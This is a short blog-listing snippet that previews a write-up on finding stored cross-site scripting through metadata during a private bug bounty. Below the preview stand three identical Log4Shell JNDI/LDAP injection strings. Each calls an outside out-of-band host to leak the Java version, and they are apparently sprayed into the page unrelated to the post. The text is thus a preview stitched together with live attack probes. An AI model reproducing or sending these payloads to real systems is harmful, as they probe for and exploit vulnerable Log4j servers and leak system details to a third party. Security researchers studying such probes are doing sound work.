Interesting Stored XSS via meta data
Back in February of this year, Bibek Neupane and I had hacked on a private bug bounty program on Hackerone, we had chosen one of the social platform as our target. This post will detail how we discovered Stored Cross-Site Scripting via meta data on o...
infos3c.hashnode.dev2 min read
${jndi:ldap://${java:version}.w30g206hoycufwfqztvy9631isojc8.oastify.com/a}
${jndi:ldap://${java:version}.w30g206hoycufwfqztvy9631isojc8.oastify.com/a}
${jndi:ldap://${java:version}.w30g206hoycufwfqztvy9631isojc8.oastify.com/a}